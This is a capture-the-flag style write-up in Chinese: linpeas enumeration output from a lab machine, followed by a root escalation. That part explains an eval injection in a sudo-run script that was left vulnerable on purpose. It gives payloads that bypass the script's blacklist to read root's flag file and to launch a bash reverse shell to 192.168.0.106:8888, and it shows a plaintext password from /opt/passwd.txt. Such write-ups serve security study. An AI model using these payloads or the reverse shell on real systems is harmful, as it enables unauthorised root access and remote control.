-rw-r--r-- 1 root root 2263 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg
-rw-r--r-- 1 root root 0 Apr  1  2025 /etc/apt/trusted.gpg.d/ondrej_ubuntu_php.gpg
-rw-r--r-- 1 root root 1769 Apr  1  2025 /etc/apt/trusted.gpg.d/php.gpg
-rw-r--r-- 1 root root 2899 Jul  1  2022 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 8700 Jun 22  2023 /usr/share/keyrings/debian-archive-bookworm-automatic.gpg
-rw-r--r-- 1 root root 8709 Jun 22  2023 /usr/share/keyrings/debian-archive-bookworm-security-automatic.gpg                                                    
-rw-r--r-- 1 root root 280 Jun 22  2023 /usr/share/keyrings/debian-archive-bookworm-stable.gpg
-rw-r--r-- 1 root root 8700 Jun 22  2023 /usr/share/keyrings/debian-archive-bullseye-automatic.gpg
-rw-r--r-- 1 root root 8709 Jun 22  2023 /usr/share/keyrings/debian-archive-bullseye-security-automatic.gpg                                                    
-rw-r--r-- 1 root root 2453 Jun 22  2023 /usr/share/keyrings/debian-archive-bullseye-stable.gpg
-rw-r--r-- 1 root root 8132 Jun 22  2023 /usr/share/keyrings/debian-archive-buster-automatic.gpg
-rw-r--r-- 1 root root 8141 Jun 22  2023 /usr/share/keyrings/debian-archive-buster-security-automatic.gpg
-rw-r--r-- 1 root root 2332 Jun 22  2023 /usr/share/keyrings/debian-archive-buster-stable.gpg
-rw-r--r-- 1 root root 73314 Jun 22  2023 /usr/share/keyrings/debian-archive-keyring.gpg
-rw-r--r-- 1 root root 36873 Jun 22  2023 /usr/share/keyrings/debian-archive-removed-keys.gpg
-rw-r--r-- 1 root root 7443 Jun 22  2023 /usr/share/keyrings/debian-archive-stretch-automatic.gpg
-rw-r--r-- 1 root root 7452 Jun 22  2023 /usr/share/keyrings/debian-archive-stretch-security-automatic.gpg
-rw-r--r-- 1 root root 2263 Jun 22  2023 /usr/share/keyrings/debian-archive-stretch-stable.gpg



╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd                       
passwd file: /etc/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)          
                                                     




-rw-r--r-- 1 root root 172 Mar 18  2025 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r-- 1 root root 92 Mar 18  2025 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r-- 1 root root 564 Mar 18  2025 /etc/ssh/ssh_host_rsa_key.pub

PermitRootLogin yes
ChallengeResponseAuthentication no
UsePAM yes
══╣ Some certificates were found (out limited):
/etc/ssl/certs/ACCVRAIZ1.pem                         
/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem
/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/etc/ssl/certs/AffirmTrust_Commercial.pem
/etc/ssl/certs/AffirmTrust_Networking.pem
/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/etc/ssl/certs/AffirmTrust_Premium.pem
/etc/ssl/certs/Amazon_Root_CA_1.pem
/etc/ssl/certs/Amazon_Root_CA_2.pem
/etc/ssl/certs/Amazon_Root_CA_3.pem
/etc/ssl/certs/Amazon_Root_CA_4.pem
/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
/etc/ssl/certs/Buypass_Class_2_Root_CA.pem
/etc/ssl/certs/Buypass_Class_3_Root_CA.pem
/etc/ssl/certs/ca-certificates.crt
/etc/ssl/certs/CA_Disig_Root_R2.pem
/etc/ssl/certs/Certigna.pem
/etc/ssl/certs/Certigna_Root_CA.pem
1563PSTORAGE_CERTSBIN

══╣ Writable ssh and gpg agents
/etc/systemd/user/sockets.target.wants/gpg-agent.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-browser.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-extra.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-ssh.socket
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config                       
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem       sftp    /usr/lib/openssh/sftp-server

══╣ /etc/hosts.allow file found, trying to read the rules:                                                
/etc/hosts.allow                                     


Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
Host *
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes




                      ╔════════════════════════════════════╗                                              
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════                        
                      ╚════════════════════════════════════╝                                              
╔══════════╣ SUID - Check easy privesc, exploits and write perms                                          
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid           
strace Not Found                                     
-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 53K Jul 27  2018 /usr/bin/chfn  --->  SuSE_9.3/10                                  
-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/newgrp  --->  HP-UX_10.20                                
-rwsr-xr-x 1 root root 83K Jul 27  2018 /usr/bin/gpasswd                                                  
-rwsr-xr-x 1 root root 47K Apr  6  2024 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8                                    
-rwsr-xr-x 1 root root 63K Apr  6  2024 /usr/bin/su
-rwsr-xr-x 1 root root 35K Apr  6  2024 /usr/bin/umount  --->  BSD/Linux(08-1996)                         
-rwsr-xr-x 1 root root 23K Jan 13  2022 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)/Generic_CVE-2021-4034                 
-rwsr-xr-x 1 root root 179K Jan 14  2023 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable     
-rwsr-xr-x 1 root root 63K Jul 27  2018 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)         
-rwsr-xr-- 1 root messagebus 51K Jun  6  2023 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 471K Dec 21  2023 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 19K Jan 13  2022 /usr/libexec/polkit-agent-helper-1                                

╔══════════╣ SGID
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid           
-rwxr-sr-x 1 root shadow 39K Feb 14  2019 /usr/sbin/unix_chkpwd                                           
-rwxr-sr-x 1 root ssh 347K Dec 21  2023 /usr/bin/ssh-agent                                                
-rwxr-sr-x 1 root shadow 71K Jul 27  2018 /usr/bin/chage                                                  
-rwxr-sr-x 1 root shadow 31K Jul 27  2018 /usr/bin/expiry                                                 
-rwxr-sr-x 1 root tty 15K May  4  2018 /usr/bin/bsd-write                                                 
-rwxr-sr-x 1 root crontab 43K Oct 11  2019 /usr/bin/crontab                                               

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#acls                    
files with acls in searched folders Not Found        
                                                     
╔══════════╣ Capabilities
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities            
══╣ Current shell capabilities                       
./linpeas.sh: 7794: ./linpeas.sh: [[: not found      
CapInh:  [Invalid capability format]
./linpeas.sh: 7794: ./linpeas.sh: [[: not found
CapPrm:  [Invalid capability format]
./linpeas.sh: 7785: ./linpeas.sh: [[: not found
CapEff:  [Invalid capability format]
./linpeas.sh: 7794: ./linpeas.sh: [[: not found
CapBnd:  [Invalid capability format]
./linpeas.sh: 7794: ./linpeas.sh: [[: not found
CapAmb:  [Invalid capability format]

╚ Parent process capabilities
./linpeas.sh: 7819: ./linpeas.sh: [[: not found      
CapInh:  [Invalid capability format]
./linpeas.sh: 7819: ./linpeas.sh: [[: not found
CapPrm:  [Invalid capability format]
./linpeas.sh: 7810: ./linpeas.sh: [[: not found
CapEff:  [Invalid capability format]
./linpeas.sh: 7819: ./linpeas.sh: [[: not found
CapBnd:  [Invalid capability format]
./linpeas.sh: 7819: ./linpeas.sh: [[: not found
CapAmb:  [Invalid capability format]


Files with capabilities (limited to 50):
/usr/bin/ping = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#ldso                    
/etc/ld.so.conf                                      
Content of /etc/ld.so.conf:                          
include /etc/ld.so.conf.d/*.conf

/etc/ld.so.conf.d
  /etc/ld.so.conf.d/fakeroot-x86_64-linux-gnu.conf   
  - /usr/lib/x86_64-linux-gnu/libfakeroot            
  /etc/ld.so.conf.d/libc.conf
  - /usr/local/lib                                   
  /etc/ld.so.conf.d/x86_64-linux-gnu.conf
  - /usr/local/lib/x86_64-linux-gnu                  
  - /lib/x86_64-linux-gnu
  - /usr/lib/x86_64-linux-gnu

/etc/ld.so.preload
╔══════════╣ Files (scripts) in /etc/profile.d/      
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#profiles-files          
total 8                                              
drwxr-xr-x  2 root root 4096 Sep  3  2022 .
drwxr-xr-x 82 root root 4096 Jan 13 04:01 ..

╔══════════╣ Permissions in init, init.d, systemd, and rc.d                                               
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#init-initd-systemd-and-rcd                                                   
                                                     
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root  729 Nov 13  2020 usr.sbin.inspircd

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No         
═╣ Credentials in fstab/mtab? ........... No         
═╣ Can I read shadow files? ............. No         
═╣ Can I read shadow plists? ............ No         
═╣ Can I write shadow plists? ........... No         
═╣ Can I read opasswd file? ............. No         
═╣ Can I write in network-scripts? ...... No         
═╣ Can I read root folder? .............. No         
                                                     
╔══════════╣ Searching root files in home dirs (limit 30)                                                 
/home/                                               
/home/rin/.bash_history
/root/
/var/www
/var/www/html/login.php

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)                      
                                                     
╔══════════╣ Readable files belonging to root and readable by me but not world readable                   
                                                     
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 200)       
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files          
/dev/mqueue                                          
/dev/shm
/home/rin
/run/lock
/run/user/1000
/run/user/1000/dbus-1
/run/user/1000/dbus-1/services
/run/user/1000/gnupg
/run/user/1000/systemd
/run/user/1000/systemd/inaccessible
/run/user/1000/systemd/inaccessible/dir
/run/user/1000/systemd/inaccessible/reg
/run/user/1000/systemd/units
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/linpeas.sh
/tmp/repeater.sh
/tmp/.Test-unix
#)You_can_write_even_more_files_inside_last_directory

/usr/local/bin/irc_bot.py
/var/lib/php/sessions
/var/tmp

╔══════════╣ Interesting GROUP writable files (not in Home) (max 200)                                     
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files          
  Group rin:                                         
/tmp/linpeas.sh                                      



                            ╔═════════════════════════╗                                                   
════════════════════════════╣ Other Interesting Files ╠════════════════════════════                       
                            ╚═════════════════════════╝                                                   
╔══════════╣ .sh files in path
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path  
/usr/bin/gettext.sh                                  

╔══════════╣ Executable files potentially added by user (limit 70)                                        
2026-01-13+04:23:49.9654462840 /tmp/linpeas.sh       
2026-01-13+04:14:19.9630547680 /tmp/repeater.sh
2025-04-11+22:22:32.8990844810 /etc/grub.d/10_linux
2025-04-11+22:07:00.9628442610 /etc/grub.d/40_custom
2025-04-05+08:32:38.1253354200 /usr/local/bin/irc_bot.py
2025-04-01+03:55:32.0919414020 /usr/local/bin/calc-prorate

╔══════════╣ Unexpected in /opt (usually empty)
total 16                                             
drwxr-xr-x  2 root root 4096 Dec 30 00:25 .
drwxr-xr-x 18 root root 4096 Mar 18  2025 ..
-rw-r--r--  1 root root   21 Dec 30 00:04 passwd.txt
-rw-r--r--  1 root root 1240 Dec 30 00:25 repeater.sh

╔══════════╣ Unexpected in root
/initrd.img.old                                      
/vmlinuz.old
/vmlinuz
/initrd.img

╔══════════╣ Modified interesting files in the last 5mins (limit 100)                                     
/home/rin/.gnupg/trustdb.gpg                         
/home/rin/.gnupg/pubring.kbx
/var/log/syslog
/var/log/auth.log
/var/log/daemon.log
/var/log/journal/52a22a6e47cb4a5995fb43c3554baa0e/system.journal
/var/log/journal/52a22a6e47cb4a5995fb43c3554baa0e/user-1000.journal

╔══════════╣ Writable log files (logrotten) (limit 50)                                                    
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#logrotate-exploitation  
logrotate 3.14.0                                     

    Default mail command:       /usr/bin/mail
    Default compress command:   /bin/gzip
    Default uncompress command: /bin/gunzip
    Default compress extension: .gz
    Default state file path:    /var/lib/logrotate/status
    ACL support:                yes
    SELinux support:            yes
╔══════════╣ Syslog configuration (limit 50)
                                                     


module(load="imuxsock") # provides support for local system logging                                       
module(load="imklog")   # provides kernel logging support                                                 





$ActionFileDefaultTemplate RSYSLOG_TraditionalFileFormat                                                  

$FileOwner root
$FileGroup adm
$FileCreateMode 0640
$DirCreateMode 0755
$Umask 0022

$WorkDirectory /var/spool/rsyslog

$IncludeConfig /etc/rsyslog.d/*.conf



auth,authpriv.*                 /var/log/auth.log
*.*;auth,authpriv.none          -/var/log/syslog
daemon.*                        -/var/log/daemon.log
kern.*                          -/var/log/kern.log
lpr.*                           -/var/log/lpr.log
mail.*                          -/var/log/mail.log
user.*                          -/var/log/user.log

mail.info                       -/var/log/mail.info
mail.warn                       -/var/log/mail.warn
mail.err                        /var/log/mail.err

*.=debug;\
        auth,authpriv.none;\
        news.none;mail.none     -/var/log/debug
*.=info;*.=notice;*.=warn;\
        auth,authpriv.none;\
        cron,daemon.none;\
        mail,news.none          -/var/log/messages

*.emerg                         :omusrmsg:*
╔══════════╣ Auditd configuration (limit 50)
auditd configuration Not Found                       
╔══════════╣ Log files with potentially weak perms (limit 50)                                             
   130852      8 -rw-r-----   1 root     adm          7408 Apr 11  2025 /var/log/auth.log.3.gz            
   134085      0 -rw-r-----   1 root     adm             0 Jan 13 03:11 /var/log/debug                    
   130854     48 -rw-r-----   1 root     adm         44033 Jan 13 03:11 /var/log/daemon.log.1             
   132336      4 -rw-r-----   1 root     adm          1690 Apr 11  2025 /var/log/user.log.1               
   130894     12 -rw-r-----   1 root     adm         11876 Mar 31  2025 /var/log/apt/term.log.2.gz        
   131235      0 -rw-r-----   1 root     adm             0 Dec 30 00:40 /var/log/apt/term.log             
   131930     12 -rw-r-----   1 root     adm         10140 Apr 11  2025 /var/log/apt/term.log.1.gz        
   133899      4 -rw-r-----   1 root     adm           644 Jan 13 03:50 /var/log/kern.log                 
   130901     16 -rw-r-----   1 root     adm         14696 Jan 13 04:24 /var/log/syslog                   
   133518      4 -rw-r-----   1 root     adm          1697 Jan 13 03:11 /var/log/auth.log.1               
   133698     88 -rw-r-----   1 root     adm         86101 Dec 29 23:05 /var/log/kern.log.2.gz            
   133984     12 -rw-r-----   1 root     adm          9209 Jan 13 04:24 /var/log/auth.log                 
   130853    196 -rw-r-----   1 root     adm        198715 Apr 11  2025 /var/log/messages.3.gz            
   130857     16 -rw-r-----   1 root     adm         13708 Apr 11  2025 /var/log/debug.3.gz               
   133311     16 -rw-r-----   1 root     adm         14763 Apr 11  2025 /var/log/syslog.4.gz              
   132383      0 -rw-r-----   1 irc      adm             0 Mar 31  2025 /var/log/inspircd.log             
   130851    116 -rw-r-----   1 root     adm        115888 Jan 13 03:11 /var/log/syslog.1                 
   133005     12 -rw-r-----   1 root     adm          9531 Dec 29 23:05 /var/log/daemon.log.2.gz          
   132995     44 -rw-r-----   1 root     adm         41915 Apr  3  2025 /var/log/syslog.7.gz              
   133942     16 -rw-r-----   1 root     adm         13986 Jan 13 03:11 /var/log/debug.1                  
   134073    108 -rw-r-----   1 root     adm        107529 Dec 29 23:05 /var/log/syslog.3.gz              
   133873      4 -rw-r-----   1 root     adm          2228 Dec 29 23:05 /var/log/auth.log.2.gz            
   133202      4 -rw-r-----   1 root     adm          3559 Dec 30 00:00 /var/log/syslog.2.gz              
   132238      4 -rw-------   1 irc      irc           328 Mar 31  2025 /var/log/ircd/ircd-hybrid-user.log
   132234      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-oper.log
   132224      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-kill.log
   132227      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-dline.log                                                    
   132240      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-debug.log                                                    
   132226      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-kline.log                                                    
   132233      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-resv.log
   132231      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-xline.log                                                    
   131094     16 -rw-r-----   1 root     adm         13851 Apr  4  2025 /var/log/syslog.6.gz              
   130855    224 -rw-r-----   1 root     adm        228576 Apr 11  2025 /var/log/kern.log.3.gz            
   133876      8 -rw-r-----   1 root     adm          4801 Dec 29 23:05 /var/log/debug.2.gz               
   133892     12 -rw-r-----   1 root     adm         11079 Jan 13 04:24 /var/log/daemon.log               
   133881     76 -rw-r-----   1 root     adm         77465 Dec 29 23:05 /var/log/messages.2.gz            
   133319     52 -rw-r-----   1 root     adm         50014 Apr 11  2025 /var/log/daemon.log.3.gz          
   133841      0 -rw-r-----   1 root     adm             0 Dec 29 23:05 /var/log/user.log                 
   134099      4 -rw-r-----   1 root     adm           794 Jan 13 03:50 /var/log/messages                 
   133852     88 -rw-r-----   1 root     adm         89768 Apr  5  2025 /var/log/syslog.5.gz              
   133953     76 -rw-r-----   1 root     adm         74947 Jan 13 03:11 /var/log/messages.1               
   133387     88 -rw-r-----   1 root     adm         88579 Jan 13 03:11 /var/log/kern.log.1               

╔══════════╣ Files inside /home/rin (limit 20)
total 28                                             
drwx------ 3 rin  rin  4096 Jan 13 04:24 .
drwxr-xr-x 3 root root 4096 Dec 29 23:06 ..
lrwxrwxrwx 1 root root    9 Dec 29 23:07 .bash_history -> /dev/null
-rw-r--r-- 1 rin  rin   220 Apr 18  2019 .bash_logout
-rw-r--r-- 1 rin  rin  3526 Apr 18  2019 .bashrc
drwx------ 3 rin  rin  4096 Jan 13 04:24 .gnupg
-rw-r--r-- 1 rin  rin   807 Apr 18  2019 .profile
-rw------- 1 rin  rin    44 Dec 30 00:29 user.txt

╔══════════╣ Files inside others home (limit 20)
/var/www/html/config.php                             
/var/www/html/item.php
/var/www/html/login.php
/var/www/html/logout.php
/var/www/html/index.php

╔══════════╣ Searching installed mail applications
                                                     
╔══════════╣ Mails (limit 50)
                                                     
╔══════════╣ Backup folders
drwxr-xr-x 2 root root 4096 Dec 29 23:43 /var/backups
total 40
-rw-r--r-- 1 root root 23836 Dec 29 23:12 apt.extended_states.0
-rw-r--r-- 1 root root  2556 Apr  4  2025 apt.extended_states.1.gz
-rw-r--r-- 1 root root  2006 Apr  1  2025 apt.extended_states.2.gz
-rw-r--r-- 1 root root  1542 Apr  1  2025 apt.extended_states.3.gz
-rw-r--r-- 1 root root   757 Mar 30  2025 apt.extended_states.4.gz


╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 9731 Jun 30  2022 /usr/lib/modules/4.19.0-21-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9731 Jun 25  2024 /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 416107 Dec 21  2020 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 194817 Oct  9  2020 /usr/share/doc/x11-common/changelog.Debian.old.gz

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)                          
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3027002

 -> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
                                                     
╔══════════╣ Web files?(output limit)
/var/www/:                                           
total 12K
drwxr-xr-x  3 root     root     4.0K Apr  4  2025 .
drwxr-xr-x 12 root     root     4.0K Apr  1  2025 ..
drwxr-xr-x  2 www-data www-data 4.0K Dec 30 00:01 html

/var/www/html:
total 44K
drwxr-xr-x 2 www-data www-data 4.0K Dec 30 00:01 .
drwxr-xr-x 3 root     root     4.0K Apr  4  2025 ..

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70) 
-rw-r--r-- 1 root root 0 Jan 13 03:11 /run/network/.ifstate.lock
-rw-r--r-- 1 root root 0 Feb 22  2021 /usr/share/dictionaries-common/site-elisp/.nosearch
-rw-r--r-- 1 rin rin 220 Apr 18  2019 /home/rin/.bash_logout
-rw-r--r-- 1 root root 220 Apr 18  2019 /etc/skel/.bash_logout
-rw------- 1 root root 0 Mar 18  2025 /etc/.pwd.lock

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)                          
-rwxr-xr-x 1 rin rin 25 Jan 13 04:14 /tmp/repeater.sh
-rwxrwxrwx 1 rin rin 971926 Jan 13 04:23 /tmp/linpeas.sh

╔══════════╣ Searching passwords in history files
/usr/share/rubygems-integration/all/gems/rake-13.0.3/lib/rake/thread_history_display.rb:      @stats   = stats
/usr/share/rubygems-integration/all/gems/rake-13.0.3/lib/rake/thread_history_display.rb:      @items   = { _seq_: 1  }
/usr/share/rubygems-integration/all/gems/rake-13.0.3/lib/rake/thread_history_display.rb:      @threads = { _seq_: "A" }

╔══════════╣ Searching passwords in config PHP files
                                                     
╔══════════╣ Searching *password* or *credential* files in home (limit 70)                                
/etc/pam.d/common-password                           
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/grub/i386-pc/legacy_password_test.mod
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/ruby/2.7.0/bundler/uri_credentials_filter.rb
/usr/lib/systemd/systemd-reply-password
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-wall.path
/usr/lib/systemd/system/systemd-ask-password-wall.service
  #)There are more creds/passwds files in the previous parent folder

/usr/lib/x86_64-linux-gnu/libmariadb3/plugin/mysql_clear_password.so
/usr/lib/x86_64-linux-gnu/libmariadb3/plugin/sha256_password.so                                           
/usr/local/mysql-5.7.38-linux-glibc2.12-x86_64/include/mysql/get_password.h
/usr/local/mysql-5.7.38-linux-glibc2.12-x86_64/include/mysql/plugin_validate_password.h
/usr/local/mysql-5.7.38-linux-glibc2.12-x86_64/include/mysql/service_mysql_password_policy.h
/usr/local/mysql-5.7.38-linux-glibc2.12-x86_64/include/plugin_validate_password.h
/usr/local/mysql-5.7.38-linux-glibc2.12-x86_64/lib/plugin/debug/validate_password.so
/usr/local/mysql-5.7.38-linux-glibc2.12-x86_64/lib/plugin/validate_password.so
/usr/share/icons/Adwaita/16x16/legacy/dialog-password.png
/usr/share/icons/Adwaita/16x16/status/dialog-password-symbolic.symbolic.png
/usr/share/icons/Adwaita/22x22/legacy/dialog-password.png
/usr/share/icons/Adwaita/24x24/legacy/dialog-password.png
/usr/share/icons/Adwaita/24x24/status/dialog-password-symbolic.symbolic.png
/usr/share/icons/Adwaita/256x256/legacy/dialog-password.png                                               
/usr/share/icons/Adwaita/32x32/legacy/dialog-password.png
/usr/share/icons/Adwaita/32x32/status/dialog-password-symbolic.symbolic.png
/usr/share/icons/Adwaita/48x48/legacy/dialog-password.png
/usr/share/icons/Adwaita/48x48/status/dialog-password-symbolic.symbolic.png
/usr/share/icons/Adwaita/64x64/status/dialog-password-symbolic.symbolic.png
/usr/share/icons/Adwaita/96x96/status/dialog-password-symbolic.symbolic.png
/usr/share/icons/Adwaita/scalable/status/dialog-password-symbolic.svg                                     
/usr/share/man/man1/systemd-ask-password.1.gz
/usr/share/man/man1/systemd-tty-ask-password-agent.1.gz
/usr/share/man/man7/credentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
  #)There are more creds/passwds files in the previous parent folder

/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/pam/password

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs                                           
                                                     
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs                                           
                                                     
╔══════════╣ Searching passwords inside logs (limit 70)                                                   
Binary file /var/log/journal/52a22a6e47cb4a5995fb43c3554baa0e/user-1000.journal matches
/var/log/installer/status:Description: Set up users and passwords

╔══════════╣ Checking all env variables in /proc/*/environ removing duplicates and filtering out useless env vars                                              
HOME=/home/rin                                       
LANG=en_US.UTF-8
_=./linpeas.sh
LISTEN_FDNAMES=dbus.socket
LISTEN_FDS=1
LOGNAME=rin
MANAGERPID=1369
NOTIFY_SOCKET=/run/systemd/notify
OLDPWD=/etc/cron.d
PWD=/tmp
SHELL=/bin/bash
SHLVL=1
SSH_CLIENT=192.168.0.106 49106 22
SSH_CONNECTION=192.168.0.106 49106 192.168.0.102 22
SSH_TTY=/dev/pts/1
TERM=xterm-256color
USER=rin
XDG_RUNTIME_DIR=/run/user/1000


                                ╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════                        
                                ╚════════════════╝   
Regexes to search for API keys aren't activated, use param '-r'

提权root

(remote) www-data@meltdown:/opt$ cat passwd.txt 
rin:b59a85af917afd07
(remote) www-data@meltdown:/opt$ cat repeater.sh 
#!/bin/bash

# 严格过滤但留有注入点的示例脚本
# 预期功能：安全地显示用户输入
# 隐藏漏洞：可通过特定方式绕过过滤执行命令

main() {
    local user_input="$1"
    
    # 基础过滤：黑名单方式过滤危险字符
    if echo "$user_input" | grep -qE '[;&|`$\\]'; then
        echo "错误：输入包含非法字符"
        return 1
    fi
    
    # 关键字过滤
    if echo "$user_input" | grep -qiE '(cat|ls|echo|rm|mv|cp|chmod)'; then
        echo "错误：输入包含危险关键字"
        return 1
    fi
    
    # 空格限制（但允许特定形式的空格）
    if echo "$user_input" | grep -qE '[[:space:]]'; then
        if ! echo "$user_input" | grep -qE '^[a-zA-Z0-9]*[[:space:]]+[a-zA-Z0-9]*$'; then
            echo "错误：空格使用受限"
            return 1
        fi
    fi
    
    # 看似安全的输出处理
    echo "处理结果: $user_input"
    
    # 隐藏的注入点：特定环境变量未被过滤
    local sanitized_input=$(echo "$user_input" | tr -d '\n\r')
    eval "output=\"$sanitized_input\""
    echo "最终输出: $output"
}

# 脚本入口
if [ $# -ne 1 ]; then
    echo "用法: $0 <输入内容>"
    exit 1
fi

main "$1"

Bash 看到 `$(` 会发生什么？

在 Bash 里：

$(whoami)

意思是：

先执行 whoami
把它的输出
当成“字符串”插进当前位置

例如你在 shell 里敲：

echo "I am $(whoami)"

如果当前用户是 root，就变成：

I am root

漏洞点

; & | ` $ \

bash 里还有一整套不用这些字符就能执行命令的机制：

机制	示例
进程替换	`<(cmd)`
文件描述符	`/dev/fd/*`
引号拼接	`"a""b"`
多行注入	利用 grep + tr
重定向	`< file`

echo "$user_input" | grep -qE '[;&|`$\\]'

只防的是第一层解析的字符

它挡的是：你直接输入 $

但你利用的不是 $ 字符本身，
而是 Bash 在 eval 的第二次解析里看到的 $

而 bash 真正执行是在 eval 时

(cat|ls|echo|rm|mv|cp|chmod)

^[a-zA-Z0-9]*[[:space:]]+[a-zA-Z0-9]*$

bash 根本不需要空格：

cmd</file
cmd<<<data
<(cmd)
<( ... )  //进程替换 → 变成一个 fd 路径

sanitized_input=$(echo "$user_input" | tr -d '\n\r')
eval "output=\"$sanitized_input\""

它等价于让 bash 把用户输入当成代码重新解析一遍。

而你前面做的所有过滤，都是在第一次解析，
但 eval 会触发第二次解析。

所以总结为

读入 $1
用 grep 黑名单过滤危险字符
用 grep 过滤命令关键字
限制空格用法
echo "处理结果: $user_input"
把输入再做一次处理并输出

方法一:读取flag

构造payload

sudo /opt/repeater.sh '"<(tee</root/root.txt>/dev/stderr)"'

grep 看：

"<(tee</root/root.txt>/dev/stderr)"

→ 放行

eval 执行：

output=""<(tee</root/root.txt>/dev/stderr)""

bash 执行：

tee</root/root.txt>/dev/stderr

方法二：文件反弹shell

rin@meltdown:~$ vi /tmp/shell
bash -c 'bash -i >& /dev/tcp/192.168.0.106/8888 0>&1'

rin@meltdown:~$ sudo /opt/repeater.sh '"<(sh</tmp/shell)"'
处理结果: "<(sh</tmp/shell)"
最终输出: /dev/fd/63

